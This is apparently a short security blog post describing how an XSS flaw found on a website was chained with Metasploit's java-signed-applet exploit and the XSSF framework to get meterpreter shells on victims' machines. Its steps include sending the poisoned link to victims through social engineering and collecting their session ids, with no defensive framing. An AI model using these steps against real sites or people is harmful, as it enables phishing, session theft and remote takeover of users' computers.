Most of the time xss vulnerability misunderstood by the security researcher even ignored saying it has no or less impact. But all the credit behind writing this blog goes to sqli, while discovering sqli I found this xss flaw in that particular website which even can leads to system compromise if the browser or any of its component s are vulnerable.

For exploiting this vulnerabilities I used metasploit-framework and The Cross-Site Scripting Framework which is a security tool designed to turn the XSS vulnerability exploitation task into a much easier work. It allows us to create the a communication channel with victim’s browser and help us to any further attacks.

1) Use the java-signed-applet exploit and remember the job id for further use. You can use any other exploit even depends on the scenario and the target.

2) Load the xssf framework in msfconsole. Press ? to see the the various options.

3) Type xssf_urls to see the useful urls.

4) Embedded the link to your vulnerable xss script and send it to the victim. Even you can send the link through social engineering.

5) User gets a prompt to run the JavaScript and obviously most of the user gonna click yes as java asking user for permission to run.Once the user click on the link his system details logs into the attacker server along with the current session id.

You can attack multiple target together using xssf framework. It has graphical version as well. Just use the help url to see the victim list in your browser.

Then look at the active session and get the meterpreter session of that victim machine.